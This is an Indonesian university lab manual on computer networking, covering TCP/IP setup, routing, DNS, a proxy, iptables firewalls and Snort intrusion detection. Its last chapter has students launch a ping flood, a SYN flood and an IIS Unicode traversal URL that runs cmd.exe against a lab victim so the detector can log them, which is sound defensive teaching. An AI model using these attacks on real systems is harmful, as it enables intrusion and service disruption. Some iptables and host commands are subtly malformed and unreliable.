Jarkom Labs PDF

MODUL PRAKTIKUM
JARINGAN KOMPUTER
VERSI 1. 2
Oleh:
Puji Hartono, S.T. (puji_bandung @ yahoo.com)
Akhmad Farid Muzayyin (zayyin_akhmad @ yahoo.com)
Davie Nika Setiawan (athin_davi @ yahoo.com)
Materi:
Konfigurasi TCP/IP
Analisa paket data dengan Netstat
Analisa paket data dengan Tcpdump
Implementasi LAN
Wireless LAN
Routing Static
Domain Name System Server
Proxy Server
System Hardening dengan Packet Filtering Firewall
System Hardening dengan NIDS
STMIK‐AMIKBANDUNG 2005
Jl. Jakarta 28 Bandung http://www.stmik‐abg.ac.id
Sistem Praktikum Jaringan Komputer
A. Sistem Penilaian
NA Praktikum= 50% Tugas Pendahuluan + 50% Jurnal Praktikum
B. Tugas Pendahuluan
1. Praktikan menyerahkan Tugas Pendahuluan sebelum praktikum dimulai
2. Tugas Pendahuluan ditulis manual‐tidak diketik pada kertas A4
3. Cover Tugas Pendahuluan dicetak dengan disertai logo kampus
C. Jurnal Praktikum
1. Praktikan langsung menyerahkan jurnal setelah praktikum selesai
2. Jurnal praktikum ditulis manual‐tidak diketik
3. Jurnal praktikum bersifat individu‐bukan kelompok
2
1
Konfigurasi TCP/IP
A. Tujuan
Setelah praktikum ini, praktikan diharapkan dapat:
1. Mengkonfigurasi TCP/IP pada NIC di sistem operasi Linux
2. Menganalisa koneksitas antar host
3. Menjelaskan MAC Address komputer lokal
4. Menjelaskan MAC Address host‐host yang terhubung dalam sebuah jaringan
5. Menganalisa rute paket ke host tujuan
B. Peralatan Praktikum

PC dengan sistem operasi Linux yang terhubung ke intranet dan internet
C. Praktikum
1. Mengonfigurasi TCP/IP di sistem operasi Linux
a) Mengecek konfigurasi TCP/IP
[root@linux /]# ifconfig
Tulis dan jelaskan output perintah diatas?
……………………………………………………………………………………………………….
……………………………………………………………………………………………………….
a) Mengonfigurasi TCP/IP
Konfigurasi TCP/IP dan default gateway terdapat dalam file
/etc/sysconfig/network-scripts/ifcfg-eth0
• Mengedit konfigurasi NIC
[root@linux /]# vi /etc/sysconfig/network-scripts/ifcfg-eth0
3
Ganti konfigurasi NIC tersebut dengan
DEVICE=eth0
ONBOOT=yes
BOOTPROTO=static
BROADCAST=10.1.3.xx
IPADDR=10.1.3.yy
NETMASK=255.255.255.0
NETWORK=10.1.3.zz
GATEWAY=10.1.3.1
Dimana “yy” adalah nomor segmen terakhir IP seperti tertera di label. “xx” dan “zz”
ditentukan berdasarkan netmask yang telah ditentukan yaitu 255.255.255.0
• Merestart service network!
[root@linux /]# service network restart
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
• Mengecek hasil konfigurasi yang baru
[root@linux /]# ifconfig
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
• Mengecek koneksitas ke host tetangga!
[root@linux /]# ping [ip_tetangga_anda]
Tulis dan jelaskan output perintah di atas !
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
2. Menganalisa MAC Address
Amati MAC Address host‐host dalam jaringan dengan perintah arp
• Mengecek MAC Address ethernet komputer lokal
root@linux /]# ifconfig
Tulis dan jelaskan MAC Address komputer yang Anda pakai
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
4
• Lakukan SSH ke komputer tetangga
root@linux /]# ssh[IP_tetangga]
• Mengecek MAC Address ethernet komputer yang terhubung ke komputer lokal
root@linux /]# arp -a
Tulis dan jelaskan MAC Address komputer yang terhubung ke komputer yang Anda
pakai
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
3. Menganalisa rute paket ke host tujuan
Amati rute paket ke host
• 10.1.3.1
• 202.62.9.220
Dengan perintah
[root@linux /]# traceroute [host_tujuan]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
5
2
Analisa Paket Data dengan Netstat
A. Tujuan
1. Menjelaskan servis apa saja yang membuka port di komputer lokal
2. Menjelaskan IP asal, IP tujuan, port asal, port tujuan dalam sebuah sesi koneksi
PC dengan sistem operasi Linux yang terhubung ke SSH server
C. Praktikum
1. Menganalisa servis yang membuka port di komputer lokal
Amatilah port berapa saja yang terbuka pada computer Anda dengan perintah netstat
[root@linux ~]# netstat --listening|more
………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………….
2. Menganalisa servis yang membuka port di komputer local dengan Network Mapper
Amatilah port berapa saja yang terbuka pada computer Anda dengan Network Mapper
[root@linux ~]# nmap localhost
………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………….
3. Menganalisa IP asal, IP tujuan, port asal, port tujuan dalam sebuah sesi koneksi
a) Menganalisa paket dari computer local
6
1. Lakukan SSH ke komputer tetangga Anda
[root@linux /]# ssh [ip_tetangga]
2. Amati IP asal, IP tujuan, port asal, port tujuan yang Anda gunakan pada sesi koneksi
tersebut
[root@linux /]# netstat |grep ESTABLISHED
……………………………………………………………………………………………………
……………………………………………………………………………………………………
b) Menganalisa paket yang MENUJU ke komputer lokal (dari komputer tetangga)
[root@linux /]# netstat |grep ESTABLISHED
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
7
3
Analisa Paket Data dengan Tcpdump
A. Tujuan
1. Menjelaskan header‐header pada layer TCP dalam paket TCP/IP
2. Menjelaskan header‐header pada layer IP dalam paket TCP/IP
PC dengan sistem operasi Linux dan aplikasi Tcpdump yang terhubung ke intranet
C. Praktikum
1. Menganalisa header‐header TCP / IP pada paket data
a) Mulailah mengcapture packet data
Untuk mempermudah pengamatan lakukan filtering paket pada Tcpdump
[root@linux /]# tcpdump host [IP tetangga]| grep ftp
b) Lakukan ftp ke computer tetangga Anda dengan user anonymous
[root@linux /]# ftp [IP_tetangga]
c) Hentikan proses capture packet
Setelah Anda berhasil login ke ftp server computer tetangga, hentikan proses capture paket
data dengan menekan Ctrl + c .
d) Amati dan gambarkan header TCP dari transmisi ftp yang baru saja Anda lakukan
8
Tulis dan jelaskan pengamatan header‐header TCP/IP yang Anda dapatkan
(source ip address, destination ipaddress, source port, destination port, sequence number &
code bits )
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
2. Menganalisa header‐header IP dan ICMP
a) Kirimlah paket ICMP dengan melakukan ping ke computer tetangga
[root@linux /]# ping [IP_tetangga]
b) Capture paket ICMP tersebut dengan Tcpdump
Untuk mempermudah pengamatan, lakukan filtering icmp pada Tcpdump
[root@linux /]# tcpdump host [IP_tetangga] | grep icmp
C) Hentikan proses capture packet
Setelah beberapa detik, hentikan proses capture paket data dengan menekan Ctrl + c .
d) Amati header dari transmisi icmp yang baru saja Anda lakukan
Tulis dan jelaskan pengamatan header‐header TCP / IP yang Anda dapatkan
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
9
4
Implementasi LAN
A. Tujuan
1. Melakukan pengkabelan straight dengan kabel UTP dan konektor RJ45
2. Melakukan pengkabelan category 5 dengan kabel UTP dan konektor RJ45
3. Membuat jaringan peer to peer
4. Membuat LAN sederhana dengan topologi star
1. PC dengan sistem operasi Linux
2. Hub/Switch sebagai konsentrator
3. Kabel UTP dan konektor RJ45
C. Praktikum
1. Pengkabelan dengan Straight
Buatlah pengkabelan straight dengan urutan kabel sebagai berikut
Gambar 1.1 Konektor RJ45
10
Terminal 1 Warna Terminal 2
1 White/Orange 1
2 Orange 2
3 White/Green 3
4 Blue 4
5 White/Blue 5
6 Green 6
7 White/Brown 7
8 Brown 8
2. Pengkabelan dengan Cathegory 5
Buatlah kabel cathegory 5 dengan urutan kabel sebagai berikut
Terminal 1 Warna Terminal 2

1 White/Orange 3
2 Orange 6
3 White/Green 1
4 Blue 4
5 White/Blue 5
6 Green 2
7 White/Brown 7
8 Brown 8
3. Membuat jaringan Peer to Peer
a) Koneksikan 2 buah komputer dengan kabel cathegory 5 yang telah Anda buat
Gambar 1.2 Jaringan peer to peer
b) Cek koneksitas antara 2 host tersebut dengan perintah ping!
Tulis dan jelaskan output perintah di atas
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
4. Pembuatan jaringan dengan topologi Star
a) Koneksikan komputer‐komputer dengan kabel straight yang telah Anda buat ke
hub/switch
11
Gambar 1.3 Jaringan dengan topologi star
b) Cek koneksitas antar host tersebut dengan perintah ping!
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
c) Koneksikan komputer‐komputer dengan kabel cathegory 5 yang telah Anda buat
ke hub/switch
d) Cek koneksitas antar host tersebut dengan perintah ping!
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
12
5
Wireless LAN
A. Tujuan
1. Menginstall dan mengkonfigurasikan Access Point
2. Menginstall dan mengkonfigurasikan Wireless Ethernet
3. Menginstall dan mengkonfigurasikan Access Point Sebagai Client

1. Hotspot Kampus
2. Wireless Access Point
3. Wireless Lan Ethernet
C. Praktikum
Gambar 1.1 skema access point sebagai client
13
Gambar 1.3 skema access point sebagai access point
C.1. Koneksi Akses Point – Wireless Ethernet
4. Mengkonfigurasi Acces Point
a) Set IP computer dengan menambahkan alias pada ip agar satu jaringan dengan access
point, ip default access point d‐link type DWL‐2100AP adalah 192.168.0.50
14
b) Buka web browser dan bypass proxy ke ip access point
c) Ketikkan ip default dari access point yaitu http://192.168.0.50 di web browser maka
akan tampil halaman awal dari access point “login screen” isi usernya admin dan
passwordnya kosong.
d) Pada menu home dan sub menu wireless ubah SSID menjadi test dan ssid broadcast di
enable
e) Pada menu advanced dan sub menu mode set access point sebagai access point.
15
5. Mengkonfigurasi Wireless Ethernet
a) Pilih sinyal access point yang ada dan klik connect
b) Setelah wireless Ethernet terkoneksi ping ke ip komputer access point.
Tuliskan output dan analisanya !
……………………………………………………………………………………………………
………………………………………………………………………………
C.2. Koneksi Hotspot – Akses Point mode Clinet
6. Mengkonfigurasi Acces Point Sebagai Client
a) Pada Menu Advanced dan sub menu mode ubah Access Point sebagai client
16
b) Tentukan Wireless (Hotspot) yang akan digunakan untuk koneksi
c) Setelah itu ping ke 202.62.9.222, Tuliskan output dan analisanya !
……………………………………………………………………………………………………
………………………………………………………………………………
17
6
Routing Static
A. Tujuan
1. Mengkonfigurasikan routing static untuk beberapa jaringan
2. Troubleshoot routing di jaringan
1. 2 buah PC dengan sistem operasi Linux sebagai workstation
2. 2 buah router
3. Skema jaringan router dan workstation sebagai berikut
Gambar 1.1 Skema jaringan praktikum routing static
C. Praktikum
1. Cek koneksitas dari Host_A ke RA
[root@host_A]# ping 10.1.4.2
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
2. Cek koneksitas dari RA ke RB
18
[root@RA]# ping 10.1.5.2
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
3. Cek koneksitas dari RB ke Host_B
[root@RB]# ping 10.1.6.2
…………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………
4. Mengamati tabel routing pada Host_A dan Host_B sebelum default gateway diset
a) Host_A
[root@host_A]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
b). Host_B
root@host_B]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
5. Mengkonfigurasi default gateway Host_A dan Host_B
Set default gateway Host_A ke 10.1.4.2 dan Host_B ke 10.1.6.1
6. Mengamati tabel routing pada Host_A dan Host_B setelah default gateway diset
19
b) Host_A
[root@host_A]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
b). Host_B
root@host_B]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
7. Mengkonfigurasi Router A
a) Aktifkan IP_FORWARD dan NAT
[root@RA]# echo “1” > /proc/sys/net/ipv4/ip_forward
[root@RA]# iptables –t nat –A POSTROUTING –s 10.1.4.0/25 –d 0.0.0.0/0 –j

MASQUERADE
Tulis dan jelaskan perintah di atas
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
b) Cek tabel routing semula
[root@RA]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
c) Konfigurasikan agar router A dapat menjangkau 10.1.6.0 melalui 10.1.5.2
[root@RA]# route add -net 10.1.6.0 netmask 255.255.255.0 gw 10.1.5.2
d) Cek tabel routing setelah tabel routing dikonfigurasikan
[root@RA]# route
20
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
8. Mengkonfigurasi Router B
a) Aktifkan IP_FORWARD dan NAT
[root@RB]# echo “1” > /proc/sys/net/ipv4/ip_forward

[root@RA]# iptables –t nat –A POSTROUTING –s 10.1.6.0/25 –d 0.0.0.0/0 –j
MASQUERADE
b) Cek tabel routing semula
[root@RB]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
c) Konfigurasikan agar router B dapat menjangkau 10.1.4.0 melalui 10.1.5.1
[root@RB]# route add -net 10.1.4.0 netmask 255.255.255.0 gw 10.1.5.1
d) Cek tabel routing setelah tabel routing dikonfigurasikan
[root@RB]# route
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
9. Cek koneksitas dari Host_A ke Router B dan ke Host_B
a) [root@host_A]# ping [RB]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
21
b) [root@host_A]# ping [Host_B]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
10. Lakukan analisa rute paket dari Host_A ke Host_B
[root@host_A]# traceroute [host_B]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
11. Lakukan analisa rute paket dari Host_B ke Host_A
[root@host_B]# traceroute [host_A]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
12. Kesimpulan
Kesimpulan Apa yang Anda dapatkan setelah selesai melakukan praktikum modul ini
(routing static) ?
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
22
7
Domain Name System
A. Tujuan
1. Membuat domain melalui DNS server
2. Menjelaskan cara kerja DNS server
3. Menganalisa masalah pada DNS

1. PC dengan sistem operasi Linux yang terhubung ke intranet
2. Software bind
3. Topologi jaringan sebagai berikut
Gambar 1.1 Topologi praktikum DNS
C. Praktikum
1. Membuat domain name Server
b) Membuat domain name
Misalkan kita akan membuat domain stmik‐abg.ac.id dan beberapa subdomain
23
Domain name Keterangan IP
ns1.stmik‐abg.ac.id Primary DNS Server 10.1.4.1
ns1.stmik‐abg.ac.id Secondary DNS Server 10.1.4.2
stmik‐abg.ac.id Web Server stmik‐abg.ac.id 10.1.4.3
www.stmik‐abg.ac.id Web Server stmik‐abg.ac.id 10.1.4.3
if.stmik‐abg.ac.id Subdomain IF 10.1.4.4
si.stmik‐abg.ac.id Subdomain SI 10.1.4.5
tk.stmik‐abg.ac.id Subdomain TK 10.1.4.6
Konfigurasi DNS server terdapat di /var/named/db.stmik‐abg.ac.id
Konfigurasikan DNS tersebut seperti contoh berikut
[root@DNSServer /]# vi /var/named/db.stmik-abg.ac.id
@ IN SOA ns1.stmik-abg.ac.id. stmik-abg.ac.id.(

2003021500 ; serial
28800;
14400;
3600000;
86400;
)
IN NS ns1.stmik-abg.ac.id.
IN NS ns2.stmik-abg.ac.id.
IN A 10.1.4.3
ns1 IN A 10.1.4.1
ns2 IN A 10.1.4.2
www IN A 10.1.4.3
if IN A 10.1.4.4
si IN A 10.1.4.5
tk IN A 10.1.4.6

c) Konfigurasikan DNS server tersebut sebagai tipe “master” untuk domain
tersebut
[root@DNSServer /]# vi /usr/local/named/etc/named.conf
Tambahkan
zone "stmik-abg.ac.id" {
type master;
file "db.stmik-abg.ac.id";
};
d) Restart named dan reload rndc
[root@DNSServer /]# killall -HUP named

[root@DNSServer /]# /usr/local/named/sbin/rndc reload
24
e) Tes hasil konfigurasi
[root@DNSServer /]# host –t ns stmik-abg.ac.id
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
[root@DNSServer /]# host –t www.stmik-abg.ac.id
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
[root@DNSServer /]# ping www.stmik-abg.ac.id
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
[root@DNSServer /]# ping if.stmik-abg.ac.id
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
7. Mengkonfigurasikan DNS Client
a) Mengkonfigurasi DNS Client
[root@DNSClient /]# vi /etc/resolv.conf
Masukkan IP DNS Server yang akan direferensikan
nameserver 10.1.4.1
nameserver 10.1.4.2
b) Tes hasil konfigurasi
[root@DNSClient /]# nslookup www.stmik-abg.ac.id
[root@DNSClient /]# nslookup if.stmik-abg.ac.id
25
8
Proxy Server
A. Tujuan
1. Menginstall dan mengkonfigurasikan Proxy Server
2. Mengkonfigurasikan proxy client pada web browser

1. PC dengan sistem operasi Linux yang terhubung ke intranet
2. Squid sebagai proxy
3. Topologi jaringan sebagai berikut
Gbr 1.1 topologi praktikum proxy server
26
C. Praktikum
1. Setting Proxy Server
a) Konfigurasi file Squid.conf
[root@linux /]# vi /etc/squid/squid.conf
Untuk mempermudah dalam pengeditan, hapuslah sel isi file
squid.conf
b) Menentukan port untuk squid
http_port 3128
c) Menentukan port ICP ( untuk menerima / merequest cache )
icp_port 3130
d) Menentukan memory cache
cache_mem 80 MB
e) Menentukan alokasi penyimpanan cache
cache_dir ufs /var/spool/squid 500 16 256
f) Menentukan Parent Proxy
cache_peer 202.62.9.222 parent 8080 3130
g) Menentukan Access Control List ( acl )
acl all src 0.0.0.0/0.0.0.0

acl lan src 10.1.3.0/255.255.255.128
acl Safe_ports port 80 443 210 119 453 70 21 1025-65535
h) Menentukan Http Access
http_access allow lan
http_access allow localhost
http_access deny !Safe_ports
http_access deny all
27
i) Simpan hasil editan file squid.conf kemudian buat partisi swap untuk squid
[root@linux /]# squid –z
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
j) Aktifkan squid
[root@linux /]# /etc/init.d/squid start
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
k) Cek apakah service squid sudah berjalan
[root@linux /]# nmap localhost
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
2. Setting Web Browser Client
a) Setting pada Web Browser computer tetangga untuk diarahkan ke proxy
server masing‐masing
28
b) Lakukan access web ke www.stmik‐abg.ac.id
c) Cek apakah Komputer client mengakses web melalui proxy server
[root@linux /]# nmap localhost
…………………………………………………………………………………………………….
…………………………………………………………………………………………………….
29
9
System Hardening dengan Firewall
(Iptables)
A. Tujuan
1. Mengkonfigurasikan firewall dengan iptables untuk personal firewall
2. Mengkonfigurasikan firewall dengan iptables untuk network firewall
3. Menginterogasi port berapa saja yang terbuka pada sebuah host dengan port scanner
1. PC dengan sistem operasi Linux yang disertai program iptables dan nmap (portscanner)
2. Router yang disertai firewall (iptables)
C. Praktikum
1. Personal Firewall
Skema jaringan sebagai berikut
a) Hapuslah seluruh rule firewall pada Personal Firewall
[root@PersonalFirewall]# iptables -F
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
30
b) Ceklah konfigurasi Host Personal Firewall yang telah masuk
[root@PersonalFirewall]# iptables -L
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
c) Ceklah port terbuka pada Personal Firewall dengan menscan host tersebut melalui Port
Scanner
[root@PortScanner]# nmap [IP_Personal_Firewall]
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
d) Konfigurasikan Personal Firewall agar hanya menerima akses SSH
[root@PersonalFirewall]# iptables -A INPUT -p tcp -s 0.0.0.0/0

-d 0.0.0.0/0 --dport 22 – ACCEPT
[root@PersonalFirewall]# iptables -A INPUT -p tcp -s 0.0.0.0/0

-d 0.0.0.0/0 -j DROP
[root@PersonalFirewall]# iptables -A INPUT -p udp -s 0.0.0.0/0

-d 0.0.0.0/0 -j DROP
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
e) Ceklah konfigurasi Host Personal Firewall yang telah masuk
[root@PersonalFirewall]# iptables -L
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
f) Ceklah port terbuka pada Personal Firewall dengan menscan host tersebut melalui Port
Scanner setelah Personal Firewall telah dikonfigurasikan
[root@PortScanner]# nmap [IP_Personal_Firewall]
Tulis dan jelaskan output perintah di atas, bandingkan dengan hasil sebelum Personal Firewall
belum dikonfigurasikan
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
31
2. Network Firewall
Skema jaringan sebagai berikut
a) Hapuslah seluruh rule firewall pada Network Firewall
[root@NetworkFirewall]# iptables -F
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
b) Ceklah konfigurasi Network Firewall yang telah masuk
[root@NetworkFirewall]# iptables -L
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
c) Ceklah port terbuka pada Host A dengan menscan host tersebut melalui Port Scanner
[root@PortScanner]# nmap [IP_Host_A]
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
d) Konfigurasikan Host Network Firewall agar router hanya mengijinkan paket SSH yang
pada semua paket data yang menuju host A
[root@NetworkFirewall]# iptables -A FORWARD -p tcp -s 0.0.0.0/0

-d [HostA]--dport 22 – ACCEPT
[root@NetworkFirewall]# iptables -A FORWARD -p tcp -s 0.0.0.0/0

-d [HostA] -j DROP
[root@NetworkFirewall]# iptables -A FORWARD -p udp -s 0.0.0.0/0

-d [HostA] -j DROP
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
32
e) Ceklah konfigurasi Network Firewall yang telah masuk
[root@NetworkFirewall]# iptables -L
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
f) Ceklah port terbuka pada Host A dengan menscan host tersebut melalui Port Scanner
setelah Network Firewall telah dikonfigurasikan
[root@PortScanner]# nmap [IP_HostA]
Tulis dan jelaskan output perintah di atas, bandingkan dengan hasil sebelum Network
Firewall belum dikonfigurasikan
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
33
10
System Hardening dengan NIDS
A. Tujuan
1. Menjelaskan cara kerja NIDS (Snort)
2. Mendeteksi dan menganalisa serangan‐serangan pada jaringan
1. Snort IDS pada system Linux
2. Webserver
3. Exploit SynFlood
4. Skema jaringan sebagai berikut
Snort NIDS Korban Penyerang
C. Praktikum
1. Pengamatan log pada Snort IDS sebelum adanya serangan
Amati log pada Snort IDS dan berikan penjelasan
[root@NIDS]# tail -f /var/log/snort/alert

………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
2. Lakukan pengiriman paket ICMP dalam ukuran besar dari host “Penyerang’ ke host
‘Korban’ yang berada 1 jaringan dengan Snort NIDS
ping [target] –l 50000 -t
34
3. Mengamati log pada Snort IDS setelah adanya serangan
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
4. Lakukan SynFlood ke sebuah host yang berada 1 jaringan dengan Snort NIDS
Syn [target]
………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
6. Lakukan serangan bug Unicode pada web server yang berada dalam 1 jaringan
dengan NIDS
Akseslah sebuah webserver yang berada dalam 1 jaringan dengan NIDS melalui browser dan
masukkan URL berikut
www.TARGET.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

………………………………………………………………………………………………………………
………………………………………………………………………………………………………………
35

Jarkom Labs PDF

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Jarkom Labs PDF

Diunggah oleh

Hak Cipta:

Format Tersedia

MODUL PRAKTIKUM

A. Sistem Penilaian

C. Jurnal Praktikum

B. Peralatan Praktikum

[root@linux /]# ifconfig

[root@linux /]# vi /etc/sysconfig/network-scripts/ifcfg-eth0

[root@linux /]# service network restart

[root@linux /]# ifconfig

[root@linux /]# ping [ip_tetangga_anda]

root@linux /]# ifconfig

root@linux /]# ssh[IP_tetangga]

• Mengecek MAC Address ethernet komputer yang terhubung ke komputer lokal

root@linux /]# arp -a

3. Menganalisa rute paket ke host tujuan

[root@linux /]# traceroute [host_tujuan]

[root@linux ~]# netstat --listening|more

[root@linux ~]# nmap localhost

[root@linux /]# ssh [ip_tetangga]

[root@linux /]# netstat |grep ESTABLISHED

[root@linux /]# netstat |grep ESTABLISHED

[root@linux /]# tcpdump host [IP tetangga]| grep ftp

[root@linux /]# ftp [IP_tetangga]

[root@linux /]# ping [IP_tetangga]

[root@linux /]# tcpdump host [IP_tetangga] | grep icmp

Terminal 1 Warna Terminal 2

[root@linux /]# ping [IP_tetangga]

[root@linux /]# ping [IP_tetangga]

[root@linux /]# ping [IP_tetangga]

B. Peralatan Praktikum

[root@host_A]# ping 10.1.4.2

[root@RB]# ping 10.1.6.2

[root@RA]# echo “1” > /proc/sys/net/ipv4/ip_forward

[root@RA]# iptables –t nat –A POSTROUTING –s 10.1.4.0/25 –d 0.0.0.0/0 –j

[root@RA]# route add -net 10.1.6.0 netmask 255.255.255.0 gw 10.1.5.2

[root@RB]# echo “1” > /proc/sys/net/ipv4/ip_forward

[root@RB]# route add -net 10.1.4.0 netmask 255.255.255.0 gw 10.1.5.1

a) [root@host_A]# ping [RB]

B. Peralatan Praktikum

[root@DNSServer /]# vi /var/named/db.stmik-abg.ac.id

@ IN SOA ns1.stmik-abg.ac.id. stmik-abg.ac.id.(

[root@DNSServer /]# vi /usr/local/named/etc/named.conf

[root@DNSServer /]# killall -HUP named

[root@DNSServer /]# host –t ns stmik-abg.ac.id

[root@DNSServer /]# host –t www.stmik-abg.ac.id

[root@DNSServer /]# ping www.stmik-abg.ac.id

[root@DNSServer /]# ping if.stmik-abg.ac.id

[root@DNSClient /]# nslookup www.stmik-abg.ac.id

[root@DNSClient /]# nslookup if.stmik-abg.ac.id

B. Peralatan Praktikum

[root@linux /]# vi /etc/squid/squid.conf

cache_dir ufs /var/spool/squid 500 16 256

cache_peer 202.62.9.222 parent 8080 3130

acl all src 0.0.0.0/0.0.0.0

[root@linux /]# squid –z

[root@linux /]# /etc/init.d/squid start

[root@PortScanner]# nmap [IP_Personal_Firewall]

[root@PersonalFirewall]# iptables -A INPUT -p tcp -s 0.0.0.0/0

[root@PersonalFirewall]# iptables -A INPUT -p tcp -s 0.0.0.0/0

[root@PersonalFirewall]# iptables -A INPUT -p udp -s 0.0.0.0/0

[root@PortScanner]# nmap [IP_Personal_Firewall]

[root@PortScanner]# nmap [IP_Host_A]

[root@NetworkFirewall]# iptables -A FORWARD -p tcp -s 0.0.0.0/0

[root@NetworkFirewall]# iptables -A FORWARD -p tcp -s 0.0.0.0/0